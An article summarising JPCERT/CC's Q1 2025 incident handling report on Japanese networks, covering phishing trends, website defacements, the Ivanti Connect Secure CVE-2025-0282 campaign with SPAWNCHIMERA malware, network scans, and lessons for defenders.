As cybercriminals evolve their techniques and tactics, defenders must stay several steps ahead to minimize the risk and damage. The latest Q1 2025 Incident Handling Report from Japan’s JPCERT Coordination Center (JPCERT/CC) provides a front-row seat into the most pressing threats facing Japanese networks this quarter—and the findings should concern organizations far beyond Japan.
Between January and March 2025, JPCERT/CC responded to 3,974 incidents, marking a 10% increase in case coordination compared to the previous quarter. The spike in activity offers a snapshot of attackers’ growing agility and the need for faster, smarter defenses.
Phishing Continues Its Reign
Phishing remains the dominant threat. Out of 6,081 confirmed incidents, a staggering 87%—or 5,267 cases—involved phishing sites.
Notably, there was a 10% increase from the previous quarter, with domestic brands being spoofed far more often than international ones. Over 81% of phishing campaigns mimicked Japanese companies. Credit Saison, Sumitomo Mitsui Card, and JCB were among the most targeted. For foreign brands, Amazon impersonation alone accounted for roughly 60% of phishing incidents. These numbers show that phishing actors are tailoring their lures to match local trust patterns.
An alarming development is the steady use of encrypted messaging apps and cloaked domains, which prolongs the window of effectiveness before takedowns. Although JPCERT/CC was able to notify the parties responsible in 53% of domestic cases, nearly half of the phishing infrastructure was hosted overseas—complicating and delaying response.
Website Defacements Growing in Volume and Sophistication
While fewer in number, website defacements saw a sharp 75% increase, with 95 cases this quarter compared to 53 in the previous one. Attackers used a range of tactics, including:
- Altering .htaccess files to redirect visitors to fake shopping sites
- Injecting PHP backdoors capable of communicating with command-and-control servers
- Embedding JavaScript-based adware and cryptocurrency miners
These intrusions not only degrade brand reputation but may also serve as entry points for follow-on attacks. Some compromised websites even loaded remote malicious code that could execute silently in the background.
Ivanti Connect Secure Vulnerability: A Cautionary Tale
JPCERT/CC also dealt with a targeted exploitation campaign centered around CVE-2025-0282, a critical vulnerability in Ivanti Connect Secure VPN appliances. Several Japanese organizations were found to be compromised after attackers established persistent access through malware known as SPAWNCHIMERA.
This malware suite was designed to evade detection and manipulate Ivanti’s own integrity checker tools. SPAWNCHIMERA combines multiple known malware components (SPAWNSNAIL, SPAWNMOLE, SPAWNANT) to establish footholds and move laterally within victim networks.
Detection was only possible after suspicious ICMP traffic was observed between Ivanti appliances and internal systems—highlighting how stealthy these campaigns can be. The malware also used legitimate system tools to blend in, a tactic common in state-backed espionage groups.
JPCERT/CC issued an advisory urging organizations using Ivanti to check for compromise using updated forensic tools. Those that delayed patching were especially at risk of long-term compromise.
Scans and Malware Sites: Probing for Weak Links
Systematic network scans also increased, with 256 incidents logged—up 10% from the previous quarter. Attackers primarily targeted common ports like Telnet (23/TCP), SSH (22/TCP), and HTTP (80/TCP). These scans are typically the reconnaissance phase for identifying weak points before launching broader attacks.
Meanwhile, malware distribution sites dropped slightly to 23 incidents. Though fewer in number, the risk remains high—especially when these sites are used to distribute loader malware or ransomware payloads in broader campaigns.
Incident Handling Benchmarks
JPCERT/CC managed to notify 96% of parties in website defacement incidents and 78% of those related to malware sites. Notification turnaround times improved, with roughly 30% of phishing notifications completed within three days. Still, nearly half of the phishing infrastructure was deemed unverifiable or already taken down by the time investigators arrived—highlighting the race against time in coordinated response.
Long-Term Trends and Strategic Gaps
The data for fiscal year 2024 shows a continued downward trend in total incident reports (down 30% year-over-year) and coordination cases (down 24%).
However, the surge in phishing and the emergence of sophisticated supply-chain vulnerabilities suggest that attackers are becoming more targeted and efficient rather than less active.
While large-scale ransomware events weren’t explicitly called out this quarter, the underlying trends—supply chain targeting, deep access via VPNs, and credential theft—could easily funnel into ransomware operations in the future.
Lessons for Defenders
- Patch VPNs and edge devices immediately. The Ivanti case reinforces that unpatched infrastructure is a persistent threat vector.
- Monitor for lateral movement. Indicators like unusual ICMP traffic or modified system tools may be the only early signs of compromise.
- Treat phishing as a persistent business risk. Even with anti-spam and awareness campaigns, phishing is evolving. Continuous URL and domain monitoring is essential.
- Improve web security hygiene. Defacements suggest vulnerable CMS setups or poor update practices. Hardening public-facing assets should be standard practice.
Final Thoughts
The Q1 2025 JPCERT/CC report makes it clear: cyber threats in Japan—and globally—are becoming more calculated, adaptive, and persistent. Phishing, exploitation of high-profile vulnerabilities, and stealthy malware deployment continue to dominate. At the same time, defenders are making strides in faster coordination and response, but global cooperation, especially across jurisdictions, is more crucial than ever.
For enterprises, vigilance must extend from the inbox to the infrastructure layer. For policymakers, the emphasis should remain on real-time collaboration, timely disclosure of vulnerabilities, and capacity building in sectors most at risk. The stakes are high, but with insight-driven defense and a unified response, the tide can be turned.
